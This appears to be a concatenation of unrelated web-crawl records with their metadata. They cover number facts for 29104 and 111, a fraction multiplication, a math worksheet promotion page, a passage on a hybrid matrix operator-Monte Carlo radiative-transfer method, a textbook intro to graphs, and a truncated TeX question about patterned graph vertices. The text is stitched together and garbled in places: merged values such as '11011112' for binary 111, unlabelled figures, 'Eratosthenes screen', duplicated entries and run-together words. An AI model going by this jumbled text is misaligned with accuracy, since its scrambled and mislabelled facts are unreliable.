29104\n\nSince 29104 divided by 856 is a whole number, 856 is a factor of 29104\n\nSince 29104 divided by 1712 is a whole number, 1712 is a factor of 29104\n\nSince 29104 divided by 1819 is a whole number, 1819 is a factor of 29104\n\nSince 29104 divided by 3638 is a whole number, 3638 is a factor of 29104\n\nSince 29104 divided by 7276 is a whole number, 7276 is a factor of 29104\n\nSince 29104 divided by 14552 is a whole number, 14552 is a factor of 29104\n\n## What are the multiples of 29104?\n\nMultiples of 29104 are all integers divisible by 29104 , i.e. the remainder of the full division by 29104 is zero. There are infinite multiples of 29104. The smallest multiples of 29104 are:\n\n0 : in fact, 0 is divisible by any integer, so it is also a multiple of 29104 since 0 × 29104 = 0\n\n29104 : in fact, 29104 is a multiple of itself, since 29104 is divisible by 29104 (it was 29104 / 29104 = 1, so the rest of this division is zero)\n\n58208: in fact, 58208 = 29104 × 2\n\n87312: in fact, 87312 = 29104 × 3\n\n116416: in fact, 116416 = 29104 × 4\n\n145520: in fact, 145520 = 29104 × 5\n\netc.\n\n## Is 29104 a prime number?\n\nIt is possible to determine using mathematical techniques whether an integer is prime or not.\n\nfor 29104, the answer is: No, 29104 is not a prime number.\n\n## How do you determine if a number is prime?\n\nTo know the primality of an integer, we can use several algorithms. The most naive is to try all divisors below the number you want to know if it is prime (in our case 29104). We can already eliminate even numbers bigger than 2 (then 4 , 6 , 8 ...). Besides, we can stop at the square root of the number in question (here 170.599 ). Historically, the Eratosthenes screen (which dates back to Antiquity) uses this technique relatively effectively.\n\nMore modern techniques include the Atkin screen, probabilistic tests, or the cyclotomic test."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.91708577,"math_prob":0.9913478,"size":5191,"snap":"2021-21-2021-25","text_gpt3_token_len":1647,"char_repetition_ratio":0.37998843,"word_repetition_ratio":0.19075145,"special_character_ratio":0.42939705,"punctuation_ratio":0.09341637,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99986684,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-17T01:05:23Z\",\"WARC-Record-ID\":\"<urn:uuid:8c75e436-146a-4ed9-9109-2917c12941fe>\",\"Content-Length\":\"24129\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e6b2b72a-ed94-4180-8821-8a944e713d09>\",\"WARC-Concurrent-To\":\"<urn:uuid:d6a1b586-dc11-45b0-b74a-b2290b917ff1>\",\"WARC-IP-Address\":\"104.21.88.17\",\"WARC-Target-URI\":\"https://calculomates.com/en/divisors/of/29104\",\"WARC-Payload-Digest\":\"sha1:6IKPPWYHFI2UCBHTYAV3XHUXQ27F4YB7\",\"WARC-Block-Digest\":\"sha1:MBW75WZQVZANBFS2VUJK3O2FRATCV6VZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991921.61_warc_CC-MAIN-20210516232554-20210517022554-00075.warc.gz\"}"} |
https://answers.everydaycalculation.com/multiply-fractions/8-49-times-35-40 | [
"Solutions by everydaycalculation.com\n\n## Multiply 8/49 with 35/40\n\nThis multiplication involving fractions can also be rephrased as \"What is 8/49 of 35/40?\"\n\n8/49 × 35/40 is 1/7.\n\n#### Steps for multiplying fractions\n\n1. Simply multiply the numerators and denominators separately:\n2. 8/49 × 35/40 = 8 × 35/49 × 40 = 280/1960\n3. After reducing the fraction, the answer is 1/7\n\nMathStep (Works offline)",
] | [
null,
"https://answers.everydaycalculation.com/mathstep-app-icon.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8491167,"math_prob":0.96834683,"size":385,"snap":"2021-31-2021-39","text_gpt3_token_len":133,"char_repetition_ratio":0.15223098,"word_repetition_ratio":0.0,"special_character_ratio":0.4077922,"punctuation_ratio":0.07317073,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98375845,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-28T04:15:01Z\",\"WARC-Record-ID\":\"<urn:uuid:a7bd406d-c56c-488e-9944-a20e5020d37d>\",\"Content-Length\":\"6883\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c311584c-605b-4bdb-ad85-c822ab609972>\",\"WARC-Concurrent-To\":\"<urn:uuid:2186f0c5-cade-417d-a333-5c8a123dcf6e>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/multiply-fractions/8-49-times-35-40\",\"WARC-Payload-Digest\":\"sha1:UDSO4ASZMYRSYVKUNK4FN7FDP3F735PI\",\"WARC-Block-Digest\":\"sha1:AM4TKVF2X2NYHNOLCSARO6ILJOCURDAK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780060201.9_warc_CC-MAIN-20210928032425-20210928062425-00119.warc.gz\"}"} |
http://www.numtoword.com/111-number-english.html | [
"# How to Write, Spell, Say 111 in English Words\n\n111 in English, Spelling for 111 in English , number to words for 111\n\none hundred eleven\n\n(Live) Coronavirus Pandemic 24/7: Death Toll, Infections, Recoveries and Real Time Counter:",
null,
"Number\n\n## How to write 111 Number in Currency Spelling?\n\n• AUD => one hundred eleven Australian dollars\n• BGN => one hundred eleven leva\n• BWP => one hundred eleven pula\n• GBP => one hundred eleven pounds sterling\n• CNY => one hundred eleven Chinese yuan\n• CHF => one hundred eleven Swiss francs\n• CZK => one hundred eleven Czech koruny\n• EEK => one hundred eleven kroonid\n• EUR => one hundred eleven euro\n• GHS => one hundred eleven Ghana cedis\n• GMD => one hundred eleven dalasi\n• HKD => one hundred eleven Hong Kong dollars\n• HRK => one hundred eleven kuna\n• HUF => one hundred eleven forint\n• INR => one hundred eleven Indian rupees\n• JMD => one hundred eleven Jamaica dollars\n• JPY => one hundred eleven Japanese yen\n• KES => one hundred eleven Kenyan shillings\n• LRD => one hundred eleven Liberian dollars\n• LSL => one hundred eleven maloti\n• LTL => one hundred eleven litai\n• LVL => one hundred eleven lati\n• MGA => one hundred eleven ariaries\n• MUR => one hundred eleven Mauritian rupees\n• MXN => one hundred eleven Mexican pesos\n• MWK => one hundred eleven Malawian kwacha\n• NAD => one hundred eleven Namibian dollars\n• NGN => one hundred eleven naira\n• NZD => one hundred eleven New Zealand dollars\n• PGK => one hundred eleven kina\n• PHP => one hundred eleven Philippine pesos\n• PKR => one hundred eleven Pakistani rupees\n• PLN => one hundred eleven zlotys\n• RON => one hundred eleven Romanian lei\n• RSD => one hundred elevenSerbian dinars\n• RUB => one hundred eleven Russian rubles\n• RWF => one hundred eleven Rwandese francs\n• SDG => one hundred eleven Sudanese pounds\n• SGD => one hundred eleven Singapore dollars\n• SLL => one hundred eleven leones\n• SZL => one hundred eleven emalangeni\n• THB => one hundred eleven baht\n• TRY => one hundred eleven Turkish lira\n• TTD => one hundred eleven Trinidad and Tobago dollars\n• TZS => one hundred eleven Tanzanian shillings\n• UAH => one hundred eleven hryvnia\n• UGX => one hundred eleven Uganda shillings\n• USD => one hundred eleven U.S. dollars\n• ZMK => one hundred eleven Zambian kwacha\n• ZMK => one hundred eleven Zambian kwacha\n• ZWL => one hundred eleven Zimbabwe dollars\n\n## Is 111 A Prime Number?\n\nNo. This is not a Prime Number...\n\n## Prime Factors Of 111 / Prime Factorization Of 111?\n\nDetermined equcation for number 111 factorization is 37 * 3\n\nThe prime factors of number 111 are: 37 *3\n\n## Is 111 A Composite Number?\n\n111 is a composite number, because it has more divisors than 1 and itself.\n\n## Is 111 An Even Number?\n\nNo. This is a not a Even Number\n\n## Is 111 An Odd Number?\n\nYes. This is a Odd Number.\n\n1. × 100\n\n12321\n\n1367631\n\n## Square Root Of 111?\n\nSquare root of 111= 10.535653752853\n\n## Cube Root Of 111?\n\nThe cubed root of three ∛111 =4.8058955337053\n\n3\n\n3\n\n111\n\n## Palindromic Number\n\n111 is the same when its digits are reversed! 
That makes it a palindromic number.\n\n348.71678454847\n\n4.7095302013123\n\n2.0453229787867\n\nCXI\n\n## 111 seconds converted to days, hours, minutes and seconds\n\n0 days 00 hours 01 min 51 sec\n\n11011112\n\n6f16\n\n1578\n\n#111\n\n## Length\n\n111 kilometre =\n\n111000 meter\n\n11100000 Centimetre\n\n111000000 Millimetre\n\n111000000000 Micrometer\n\n1.11E+14 Nanometer\n\n68.972181 Mile\n\n121391.03855951 Yard\n\n364173.11567854 Foot\n\n4370077.3881425 Inch\n\n59.935186640831 Nautical mile\n\n111 Metre =\n\n0.111 kilometre\n\n11100 Centimetre\n\n111000 Millimetre\n\n111000000 Micrometer\n\n111000000000 Nanometer\n\n0.068972181 Mile\n\n121.39103856 Yard\n\n364.17311568 Foot\n\n4370.07738816 Inch\n\n0.059935186641071 Nautical mile\n\n111 Centimetre =\n\n0.00111 kilometre\n\n1.11 Metre\n\n1110 Millimetre\n\n1110000 Micrometer\n\n1110000000 Nanometer\n\n0.0006897207 Mile\n\n1.2139071 Yard\n\n3.6417324 Foot\n\n43.700811 Inch\n\n0.0005993556 Nautical mile"
] | [
null,
"http://www.numtoword.com/youtube/corana.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.7725482,"math_prob":0.90144956,"size":939,"snap":"2020-10-2020-16","text_gpt3_token_len":263,"char_repetition_ratio":0.14331551,"word_repetition_ratio":0.06896552,"special_character_ratio":0.3109691,"punctuation_ratio":0.14285715,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96963054,"pos_list":[0,1,2],"im_url_duplicate_count":[null,8,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-05T22:32:46Z\",\"WARC-Record-ID\":\"<urn:uuid:fd9b5304-50f5-49f8-83ae-2aa0bfbed0d5>\",\"Content-Length\":\"31458\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0a541915-16b1-45ef-8e39-bde514e1a06f>\",\"WARC-Concurrent-To\":\"<urn:uuid:bd8328fa-f22a-43f0-a2c8-763ab15b775f>\",\"WARC-IP-Address\":\"107.180.26.181\",\"WARC-Target-URI\":\"http://www.numtoword.com/111-number-english.html\",\"WARC-Payload-Digest\":\"sha1:EKSOM3WRZNWQFYYGCZNYVAVZ6LBMVVPC\",\"WARC-Block-Digest\":\"sha1:37JIBPHWW3E25XJGYPVOA7HYTPNDH3XK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371611051.77_warc_CC-MAIN-20200405213008-20200406003508-00360.warc.gz\"}"} |
https://kot-kota.ru/sixth-grade-math-word-problems-712.html | [
"# Sixth Grade Math Word Problems\n\nTags: Dissertation Sur Antigone De SophocleApartheid Cause And Effect EssayComputer Homework HelpPersonal Essay HelpTerm Paper Music TherapySociety Changing EssayImportance Of Study Habits EssaysSensation And Perception Conclusion EssayEssay On A Trip To Space StationAssignment Business Law\n\nYou may select between regrouping and non-regrouping type of problems.\n\nSubtraction Word Problems Worksheets Using 1 Digit These subtraction word problems worksheets will produce 1 digit problems, with ten problems per worksheet.\n\nSubtraction Word Problems Worksheets Using 2 Digits These subtraction word problems worksheets will produce 2 digits problems, with ten problems per worksheet.\n\nAddition and Subtraction Word Problems Worksheets Using 1 Digit These addition and subtraction word problems worksheets will produce 1 digit problems, with ten problems per worksheet.\n\nOur word problems worksheets are free to download, easy to use, and very flexible.\n\nThese word problems worksheets are a great resource for children in 3rd Grade, 4th Grade, and 5th Grade.\n\nAddition Word Problems Worksheets Using 2 Digits with 3 Addends These addition word problems worksheets will produce 2 digits problems with three addends, with ten problems per worksheet.\n\nAddition Word Problems Worksheets 2 Digits Missing Addends These addition word problems worksheet will produce 2 digits problems with missing addends, with ten problems per worksheet.\n\nAddition Word Problems Worksheets Using 1 Digit with 2 Addends These addition word problems worksheets will produce 1 digit problems with two addends, with ten problems per worksheet.\n\n• ###### Dynamically Created Word Problems -\n\nThese Word Problems Worksheets are perfect for practicing solving and. These word problems worksheets are appropriate for 4th Grade, 5th Grade, and 6th.…\n\n• ###### Th grade Math Word Problems - LiveBinder\n\nThis LiveBinder has a great collection of math word problems for 6th graders. Includes worksheets, links to pdfs and some background as to the development.…\n\n• ###### Th Grade Math Word Problems solutions, examples, videos\n\nTh Grade Math Word Problems, ratio and proportions using bar models, tape diagrams or block diagrams, examples with step by step solutions, How to solve.…\n\n• ###### Th Grade Math Word Problems - Pinterest\n\nSolving math problems can intimidate sixth-graders, but by using a few simple formulas, students can easily calculate answers to worksheet questions.…\n\nLearn sixth grade math for free—ratios, exponents, long division, negative numbers. and subtracting decimals word problems Arithmetic operationsMultiplying.…\n\n• ###### Th-Grade Math Word Problems - ThoughtCo\n\nSolving math problems can intimidate sixth-graders, but by using a few simple formulas, students can easily calculate answers to worksheet.…"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8639851,"math_prob":0.7961942,"size":3077,"snap":"2021-31-2021-39","text_gpt3_token_len":616,"char_repetition_ratio":0.24341035,"word_repetition_ratio":0.2646421,"special_character_ratio":0.18329541,"punctuation_ratio":0.102514505,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9960577,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-24T13:40:48Z\",\"WARC-Record-ID\":\"<urn:uuid:02053f1c-c0df-4b94-a8ec-93a84cbf3107>\",\"Content-Length\":\"34735\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5f7e5510-2a92-4e02-9193-26489f4ecc99>\",\"WARC-Concurrent-To\":\"<urn:uuid:d213fce0-610a-4651-8762-b565c164a87f>\",\"WARC-IP-Address\":\"172.67.195.82\",\"WARC-Target-URI\":\"https://kot-kota.ru/sixth-grade-math-word-problems-712.html\",\"WARC-Payload-Digest\":\"sha1:SLKUKSK5Z2PCHXARJYTPGCSHPAZTRHZJ\",\"WARC-Block-Digest\":\"sha1:BGWGGKSFELZWLHETCM32MW2EWD4HPHN2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150266.65_warc_CC-MAIN-20210724125655-20210724155655-00435.warc.gz\"}"} |
https://www.thermopedia.com/ru/content/259/ | [
"Пользователь: Guest\nКоличество просмотров:\n35979\n\n\n## HYBRID METHOD\n\nTo better solve the radiative transfer equations in specific situations, people have used hybrid radiative transfer models that combine the computational power of more than one of the radiative transfer methods introduced above. For example, Zhai et al. (2008a,b) reported a hybrid matrix operator-Monte Carlo (HMOMC) method that is optimized for simulations of the light field under dynamic ocean surfaces. Ota et al. (2010) reported a hybrid matrix formulation that uses both the discrete ordinate and matrix operator methods. In this article, we will only introduce the HMOMC method.\n\nAlmost all radiative transfer methods assume that the coupled atmosphere-ocean system is static. The air-sea interface is considered to be either flat or roughened, but is treated using the static Cox-Munk wave slope model, which gives reasonably good results for understanding the time-averaged light field. However, the real light field in a coupled atmosphere-ocean system (CAOS), especially that just beneath the air-sea interface, is highly dynamic and dominated by the instantaneous wavy ocean surface above it. To solve for the dynamic radiation field using conventional radiative transfer (RT) methods in this scenario, one has to run the complete RT model for each individual frame, which makes it highly inefficient and virtually impractical. Recently, as part of the effort in the Radiance in a Dynamic Ocean (RaDyO) project, a hybrid method (Zhai et al., 2008b) combining the power of both the matrix operator and Monte Carlo methods has been reported to make dynamic simulations practical.\n\nThe dynamic CAOS is inherently a 3D system since horizontal inhomogeneity in the light field is introduced by the instantaneous wave slope field. Therefore, the 1D matrix operator formalism has to be extented to 3D, where an impulse-response function is not only a function of the impulse and response directions ni and nr, but is also a function of the impulse and response positions ri and rr. It can be compactly written as a 16-dimensional matrix F(r)(i)), where ρ = (r,n) denotes a combination of both the position and direction vectors. Each subset of this multidimensional matrix is in turn a 2D 4 × 4 Mueller matrix. The dynamic nature of the system introduces an extra temporal argument t, such that an impulse-response function becomes F(r)(i);t). Keep in mind here that working on matrices implies that the angular and spatial dimensions are both discretized into grids. Specifically, the horizontal dimension has to be considered finite (unlike other methods that assume a semi-infinite plane-parallel system) with positions r being discretized grid points in the finite horizontal domain. Boundary conditions, such as simple periodic boundary conditions, are used to extend the finite computational domain to infinity.\n\nSimilar to the conventional matrix operator method, the hybrid method expresses the dynamic polarized underwater light field Id(d);t) as",
null,
"(1)\n\nwhere d denotes the depth of the detector below the ocean surface, and D0d(d)(0);t) is the effective detector response function that relates a detector response at a given ρ(d) to the incident light field at any ρ(0). The temporal variation in the light field is explicitly shown in Eq. (1). To describe D0d(d)(0);t) in the matrix operator formalism, it is most convenient to partition the CAOS into three parts, namely, the atomsphere, the ocean surface, and the ocean along with its bottom. The top of the atmosphere, the bottom of the atmosphere/the top of the surface, the bottom of the surface/the top of the ocean, and the bottom of the ocean are labeled as levels 0, 1, 2, and 3, respectively in Fig. 1. The level of the underwater detector, d, is also shown. With this partition, D0d(d)(0);t) in Eq. (1) can be expanded and compactly written as",
null,
"(2)\n\nwhere only the first two orders of coupling terms are explicitly shown. Arguments ρ(r) and ρ(i) are suppressed for simplicity. These coupling terms are illustrated in Fig. 1 as well.",
null,
"Figure 1. Partition of the CAOS into three parts, and the first two orders of coupling terms.\n\nTo design a more computationally efficient method for the light field immediately below the air-sea interface in a dynamic CAOS, note that the dynamic characteristics of the system are mainly carried by the surface layer, where the temporal variations can be much less than a second. Therefore, the impulse-response functions in this layer [such as T12(r)(i);t) and R21(r)(i);t)] have to be considered dynamic. On the other hand, the optical properties in the atmosphere and ocean parts are at most slowly varying on the order of minutes, if turbulence is not considered. Therefore, these two parts can be treated statically, and the corresponding impulse-response functions can be considered temporally independent; for example, T01(r)(i)) and R01(r)(i)). With these properties considered, Eq. (2) reduces to",
null,
"(3)\n\nIn the conventional matrix operator method, one has to first calculate the radiative transfer (i.e., the impulse-response functions) for infinitesimally thin layers, and then couple these functions to get it for the whole atmosphere/ocean system. In the HMOMC model, the whole atmosphere is treated as an integrated system, whose 3D impulse-response functions are precalculated from 3D Monte Carlo calculations (Zhai et al., 2008a). This applies to the whole ocean, including its bottom as well. These static atmospheric and oceanic impulse-response functions (for example, T01, T12, and D2d) are then coupled to those in the dynamic surface layer [for example, T12(t) and R21(t)], which are determined by Fresnel formulas. The coupling is done by a 3D expansion of the matrix operator method as previously mentioned to get the dynamic underwater light field. Using this coupling scheme, no computational efforts are wasted in unnecessary calculations of radiative transfer in the virtually static atmosphere and ocean parts at all instances in time. This makes it much more efficient than a conventional RT method (for example, a direct 3D Monte Carlo method) for the purpose of calculating the dynamic underwater light field just below the air-sea interface.\n\nA dual-grid scheme reported by You et al. (2009) can be employed to further improve the computational efficiency of the HMOMC method. Notice that the wavelengths of typical gravity and capillary waves in real ocean surfaces are on the order of centimeters or even millimeters. To resolve these wave structures, one has to discretize the horizontal computational domain into very small grids, which makes the computation and the storage of necessary impulse-response functions prohibitively difficult. On the other hand, the optical properties of the atmosphere and ocean are usually horizontaly homogeneous on a much larger scale, and can be discretized into coarser grids. A grid size on the order of meters is sufficient for open waters, and can be smaller for relatively dyamic coastal waters. In the dual-grid scheme, the atmosphere and ocean parts are discretized into larger medium grids, while the ocean surface is discretized into smaller surface grids (Fig. 2). In this scheme, there are multiple surface grids that correspond to the same medium grid.",
null,
"Figure 2. Discretizations of the computational domain in the single-grid scheme (a), and the dual-grid scheme (b) (adapted from You et al. 2009).\n\nSpecial attention is needed to appropriately couple the medium and surface grids. For example, in the coupling term D2d · T12(t) · T01, the same medium impulse-response functions T01(r)(i)) and D2d(r)(i)) will be used for all surface grids that correspond to the same medium grid. This dual-grid scheme substantially reduces the required computational resources and satisfactorily keeps the accuracy of the computed light field. Figure 3 shows angular and spatial distributions of the downwelling radiance field as viewed by an array of nine detectors immediately beneath a dynamic ocean surface computed from the HMOMC method. The detectors are about 1.4 m away from each other. The horizontal inhomogeneity is obvious in Fig. 3. The temporal variation can be seen in the simulated “time series” of the radiance field (You et al., 2009).",
null,
"Figure 3. Simulated angular and spatial distributions of the radiance field immediately beneath a dynamic ocean surface (adapted from You et al., 2009).\n\nA fast irradiance version of the HMOMC method (Fig. 4, You et al., 2010) has been developed to simulate the high-frequency temporal fluctuations in the downwelling irradiance beneath a dynamic ocean surface. Using this fast model, it is possible to simulate the temporal variations in the underwater downwelling irradiance Ed(t) to within several meters of the ocean surface with an extremely high sampling rate. In the simulated 10-min-long time series of Ed(t) with a sampling rate of 1 kHz, the probability densities of the normalized instantaneous downwelling irradiance Ed(t) /⟨Ed⟩ at various depths are consistent with their counterparts from field measurements made during the RaDyO Santa Barbara Channel experiment.",
null,
"Figure 4. Simulated and measured probability density functions of the normalized downwelling irradiance at various depths (adapted from You et al. 2010).\n\n#### REFERENCES\n\nOta, Y., Higurashi, A., Nakajima, T., and Yokota, T, Matrix formulations of radiative transfer including the polarization effect in a coupled atmosphere-ocean system, J. Quant. Spectr. Radiat. Transfer, vol. 111, pp. 878-894, 2010.\n\nYou, Y., Zhai, P.-W., Kattawar, G. W., and Yang, P., Polarized radiance fields under a dynamic ocean surface: a three-dimensional radiative transfer solution, Appl. Opt., vol. 48, no. 16, pp. 3019-3029, 2009.\n\nYou, Y., Stramski, D., Darecki, M., and Kattawar, G. W., Modeling of wave-induced irradiance fluctuations at near-surface depths in the ocean: a comparison with measurements, Appl. Opt., vol. 49, no. 6, pp. 1041-1053, 2010.\n\nZhai, P.-W., Kattawar, G. W., and Yang, P., Impulse response solution to the three-dimensional vector radiative transfer equation in atmosphere-ocean systems. I. Monte Carlo method, Appl. Opt., vol. 47, pp. 1037-1047, 2008a.\n\nZhai, P.-W., Kattawar, G. W., and Yang, P., Impulse response solution to the three-dimensional vector radiative transfer equation in atmosphere-ocean systems. II. The hybrid matrix operator-Monte Carlo method, Appl. Opt., vol. 47, pp. 1063-1071, 2008b.\n\n#### Использованная литература\n\n1. Ota, Y., Higurashi, A., Nakajima, T., and Yokota, T, Matrix formulations of radiative transfer including the polarization effect in a coupled atmosphere-ocean system, J. Quant. Spectr. Radiat. Transfer, vol. 111, pp. 878-894, 2010.\n2. You, Y., Zhai, P.-W., Kattawar, G. W., and Yang, P., Polarized radiance fields under a dynamic ocean surface: a three-dimensional radiative transfer solution, Appl. Opt., vol. 48, no. 16, pp. 3019-3029, 2009.\n3. You, Y., Stramski, D., Darecki, M., and Kattawar, G. W., Modeling of wave-induced irradiance fluctuations at near-surface depths in the ocean: a comparison with measurements, Appl. Opt., vol. 49, no. 6, pp. 1041-1053, 2010.\n4. Zhai, P.-W., Kattawar, G. W., and Yang, P., Impulse response solution to the three-dimensional vector radiative transfer equation in atmosphere-ocean systems. I. Monte Carlo method, Appl. Opt., vol. 47, pp. 1037-1047, 2008a.\n5. Zhai, P.-W., Kattawar, G. W., and Yang, P., Impulse response solution to the three-dimensional vector radiative transfer equation in atmosphere-ocean systems. II. The hybrid matrix operator-Monte Carlo method, Appl. Opt., vol. 47, pp. 1063-1071, 2008b."
] | [
null,
"https://www.thermopedia.com/content/4936/img5.gif",
null,
"https://www.thermopedia.com/content/4936/img9.gif",
null,
"https://www.thermopedia.com/content/4936/1.gif",
null,
"https://www.thermopedia.com/content/4936/img16.gif",
null,
"https://www.thermopedia.com/content/4936/2.gif",
null,
"https://www.thermopedia.com/content/4936/3.jpg",
null,
"https://www.thermopedia.com/content/4936/4.gif",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.86753273,"math_prob":0.95281905,"size":11869,"snap":"2023-40-2023-50","text_gpt3_token_len":2787,"char_repetition_ratio":0.13409187,"word_repetition_ratio":0.18853363,"special_character_ratio":0.22925268,"punctuation_ratio":0.17781541,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9771131,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-02T20:49:57Z\",\"WARC-Record-ID\":\"<urn:uuid:c5cffdbc-b6b0-4a5b-92ba-0499d1765713>\",\"Content-Length\":\"31075\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c6f17033-8598-40f1-9f41-b1f19fe024bf>\",\"WARC-Concurrent-To\":\"<urn:uuid:40209223-253c-4c3c-bb25-5860c7feb799>\",\"WARC-IP-Address\":\"169.59.241.43\",\"WARC-Target-URI\":\"https://www.thermopedia.com/ru/content/259/\",\"WARC-Payload-Digest\":\"sha1:QJLWAKOAAYK4KKDY2TUWJCGOCG2C4TWJ\",\"WARC-Block-Digest\":\"sha1:X6PFLFQ24G55YF42FOBYL7FSY24IYYAO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100452.79_warc_CC-MAIN-20231202203800-20231202233800-00668.warc.gz\"}"} |
https://flylib.com/books/en/2.300.1/graphs.html | [
"# Graphs\n\nSo far we have dealt only with linear structures and trees. A linear structure can be considered a special case of a tree, where every node (except for the single leaf) has exactly one child. Just as trees generalize linear structures, graphs generalize trees (Figure 15-1). The key difference between trees and graphs is that, in a graph, there may be more than one path between two nodes.\n\nFigure 15-1. A linear structure (left) is a special case of a tree (middle), which is in turn a special case of a graph (right).",
null,
"This chapter begins with discussions of graph terminology (Section 15.1), representation (Section 15.2), and traversal (Section 15.3). The remaining sections present several algorithms related to graphs. An incredible variety of computational problems can be phrased in terms of graphs. For example:\n\n• Consider a set of tasks in a complicated cooking or industrial fabrication process. Some of the tasks have others as prerequisites. In what order can the tasks be performed? This is the topological sorting problem, addressed in Section 15.4.\n• What is the shortest driving route from Los Angeles to Chicago? Section 15.5 covers algorithms for finding shortest paths.\n• Given a set of computers in various locations in a building, how can they be connected with the least amount of cable? This is the problem of finding a minimum spanning tree, discussed in Section 15.6.",
null,
"Data Structures and Algorithms in Java\nISBN: 0131469142\nEAN: 2147483647\nYear: 2004\nPages: 216\nAuthors: Peter Drake\n\nSimilar book on Amazon",
null,
""
] | [
null,
"https://flylib.com/books/2/300/1/html/2/images/15fig01.jpg",
null,
"https://flylib.com/icons/4583-small.jpg",
null,
"https://flylib.com/media/images/top.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.851437,"math_prob":0.9223765,"size":1320,"snap":"2021-31-2021-39","text_gpt3_token_len":301,"char_repetition_ratio":0.12613982,"word_repetition_ratio":0.015,"special_character_ratio":0.2030303,"punctuation_ratio":0.12448133,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9762799,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,4,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-18T14:13:25Z\",\"WARC-Record-ID\":\"<urn:uuid:8b09e080-466f-4499-942a-9e46809bbac3>\",\"Content-Length\":\"36608\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:66fbe66b-5c44-4f60-8064-d8ddd64e6862>\",\"WARC-Concurrent-To\":\"<urn:uuid:9084039e-2528-460c-9beb-6fb52cf515e6>\",\"WARC-IP-Address\":\"179.43.157.53\",\"WARC-Target-URI\":\"https://flylib.com/books/en/2.300.1/graphs.html\",\"WARC-Payload-Digest\":\"sha1:TUVWVKBCBHYBWSHVHFZXT535TIQXQRKC\",\"WARC-Block-Digest\":\"sha1:HUQZTGZCOZE4FQ7EH4JDK54Z6LS4QKCN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780056476.66_warc_CC-MAIN-20210918123546-20210918153546-00664.warc.gz\"}"} |
https://tex.stackexchange.com/questions/155437/how-can-i-fill-a-vertex-with-black-bars | [
"# How can I fill a vertex with black bars?\n\nSuppose I have simple graph drawing like the following.\n\n\\documentclass[12pt,a4paper]{article}\n\\usepackage{tkz-graph}\n\n\\begin{document}\n\n\\begin{figure}\n\\begin{tikzpicture}\n\n\\SetUpEdge[lw = 1.5pt, color = black, labelcolor = white]\n\\GraphInit[vstyle=Classic]\n\n\\tikzset{VertexStyle/.append style = {minimum size = 8pt, inner sep = 0pt}}\n\n\\Vertices[unit=2]{circle}{a,b,c,d,e,f}\n\n% It's easy to change the color of a vertex!\n\\AddVertexColor{white}{a,d}\n\\Edges(a,b,c,d,e,f,a)\n\n\\end{tikzpicture}\n\\end{figure}\n\n\\end{document}\n\n\nFrom the documentation, I could figure out how to change the color of a vertex, as is done in the code. However, I'd like to use only black and white to represent several colors. For example, could I have a vertex that is filled with black bars? If so, how? This could represent \"blue\", while vertex filled with black is \"green\", and a vertex filled with white is \"red\".\n\n• Welcome to TeX.SX! You can have a look at our starter guide to familiarize yourself further with our format. – Speravir Jan 22 '14 at 17:51\n\n## 1 Answer\n\nLoad the patterns library, and add pattern=<style> to the definition of VertexStyle, where <style> include, for example, horizontal lines, vertical lines, north east lines, north west lines, etc.\n\n# Code\n\n\\documentclass[12pt,a4paper]{article}\n\\usepackage{tkz-graph}\n\\usetikzlibrary{patterns}\n\n\\begin{document}\n\n\\begin{figure}\n\\begin{tikzpicture}\n\n\\SetUpEdge[lw = 1.5pt, color = black, labelcolor = 